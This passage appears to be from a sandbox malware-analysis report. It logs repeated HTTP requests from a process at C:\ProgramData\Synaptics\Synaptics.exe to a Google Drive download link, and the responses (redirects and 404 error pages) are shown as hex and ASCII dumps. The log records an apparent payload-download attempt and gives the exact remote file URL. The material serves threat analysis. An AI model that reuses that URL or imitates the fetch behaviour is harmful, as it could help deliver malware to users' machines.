arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:32 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49802	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:32 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49807	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:32 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49809	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:32 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49819	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:33 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:33 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:33 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-RQDEB7-GmPsz9QZdT_1k4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49818	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:33 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:33 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:33 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-PQxRhFJEEPqABi6WUJy9qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49826	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:34 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:35 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:34 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-fIcZIuJl3qoRdf4fpzb9vA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49827	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:34 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:34 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6khCe_X_oQCEGbCmX32iULbtqBZVZhZbFzoV66Y7oB9sLJgzORGtsFxeG3tEt29zAwldotJfM Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:34 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-GpYMoAvmqK0IhwUhsHRNGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:34 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:34 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 49 42 59 37 45 71 42 59 47 7a 37 69 69 43 72 4c 6b 6d 73 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="4IBY7EqBYGz7iiCrLkmsNw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:34 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49828	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:34 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:34 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:34 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-7bsGSuYKFzTEay3-Yvm1Qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49829	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:34 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:35 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5WJunIYLqNKgRhV8ifufrVBsltiAqoSaKnGGI9RAJ-ZZPhBZ0dHmeEQzFKUz-PGw8qjb8a5Cc Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:35 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-Lj6dxYjfXh8hU8uBbf-gHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:35 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:35 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 54 47 37 41 64 6c 50 62 58 4c 79 48 5f 36 79 69 32 4b 52 59 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="6TG7AdlPbXLyH_6yi2KRYw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:35 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49837	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:35 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:36 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7mghtvx6WSKgy_aneO_pbNj_m5_Ii_Vl9QrM9QGs-YSa8n03vMBAQrTBeP1wnwG8e3 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:35 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-6VFVOc0uAVcICla4LR9c6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:36 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:41:36 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 77 42 4d 5f 5a 65 63 63 35 64 39 77 54 5a 2d 5a 48 79 64 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="NwBM_Zecc5d9wTZ-ZHydQw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:41:36 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49844	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:35 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:36 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4kytxt1FOuhI338g_Rucq6mvnWmHq4z78Ls-gv3ZGsICMA-C5GKDIQ-36VV4OOJsi8FGUyJ8I Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:36 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-tp-O6rYIdEnkGxXoGZKhAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:36 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
